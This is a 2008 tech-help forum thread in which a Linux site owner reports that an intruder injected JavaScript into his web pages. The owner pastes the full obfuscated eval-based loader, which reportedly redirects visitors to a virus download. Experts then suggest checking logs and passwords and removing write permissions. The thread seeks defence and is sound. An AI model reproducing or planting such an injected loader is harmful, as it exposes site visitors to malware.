Virus on My websites

Posted on 2008-10-12
Medium Priority
Last Modified: 2013-11-22
Someone hacks into my html and php server and he adds this piece of javascript code that it redirects you to a website that downloads virus

<script language=JavaScript>function pbn15(p) {var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,24,6,16,62,13,7,17,31,21,0,0,0,0,0,0,40,9,12,1,32,22,5,47,26,38,3,43,28,49,61,57,29,41,19,59,48,11,23,25,51,42,39,0,0,0,0,8,0,14,4,50,53,0,46,45,52,10,18,56,44,30,27,55,54,58,36,37,34,60,33,35,15,2,20);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(253^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}pbn15('ijOrWiQtRS1tLI_taylpOiOr1YgMWiQZ_yAIRIkhi4_sAtWdH6Bsn4_Z3tWoRcAr1yBc_wuXioLoa4@Ze0PsAI1w6UghLIWI3SQrRI_IRI_h82QrmHOhRtWtjZ@hyKgdTcWt9aNwjtkrWE5lLI1sR0_ZRIQr3E5dVSuXb0Bczngp_wBcxKLXHngp8ogtzIWt9yLcaRLo9tAsHEWteKBcPS1tb2AIe0PIzq1w7cAv6xQrRtOoJ6lhzfOwLyAIJK5d')</script><!-- -->

How can i protect my site and how can i track him down ? He has done a lot of damage on our reputation and our clients..

Please help.

Question by:cscg1976

Expert Comment

ID: 22700977
Do you have IIS logging setup on your IIS?

Expert Comment

ID: 22700985
What fire do you have protecting your IIS server, Does that have logging enabled?

Author Comment

ID: 22701315
It's a Linux box. I don't know what is hapenning.
WEBINAR: GDPR Implemented - Tips & Lessons Learned

Join the WatchGuard team on Thursday, March 29th as we recount some valuable lessons learned in weighing the needs of a business against the new regulatory environment, look ahead at the two months left before implementation, and help you understand the steps you can take today!


Expert Comment

ID: 22701360
Please provide Linux details : Model and versions.
Is the firewall part of the box or do you have a hardware firewall?
LVL 12

Expert Comment

ID: 22702477
Ping your server to see if it was a DNS attack in stead of a data one. Do you know that he gained access to your machine. Ping from proxies to make sure you are hitting from multiple locations.

Author Comment

ID: 22702796
How can i ping from proxies?
LVL 21

Accepted Solution

Daniel McAllister earned 2000 total points
ID: 22953303
This question SHOULD have been posted to a Linux zone...

The reason you're getting hacked is that your system is likely vulnerable to breakin from a user account with an easy-to-guess username/password combination (like username dan, password dan; or username dan, password password)

If you're getting hacked, then they're logging in as a USER and that USER is modifying your web site contents. The file is successfully modified because WRITE permission exists on the file.

As a FIRST step, set the permissions to "no-write" for all of your website
From a command prompt, probably with root permissions, execute
chmod ugo-w /var/www/html

If you STILL get hacked, then either your ROOT user password is known (or easy to guess), or the "culprit" is the owner of one of those files/folders.

What I've provided here are just rudimentary steps. It's possible, but unlikely, that you've got vulnerabilities in your apache web server, ssh server, or any of the other services you've got turned on. If you're a novice admin, you're probably also logging in directly as root (a VERY bad idea).

Suffice it to say, if you're NEW to Linux Admin and this is a "professional" server (business website(s), email, etc.), then you may want to look into paying a professional to "lock it down" for you.

Good Luck!

LVL 23

Expert Comment

by:Tony McCreath
ID: 23103334
I just found this article that also points to access via a user account


Featured Post

We Need Your Input!

WatchGuard is currently running a beta program for our new macOS Host Sensor for our Threat Detection and Response service. We're looking for more macOS users to help provide insight and feedback to help us make the product even better. Please sign up for our beta program today!

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

If you thought ransomware was bad, think again! Doxware has the potential to be even more damaging.
These days, all we hear about hacktivists took down so and so websites and retrieved thousands of user’s data. One of the techniques to get unauthorized access to database is by performing SQL injection. This article is quite lengthy which gives bas…
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

619 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question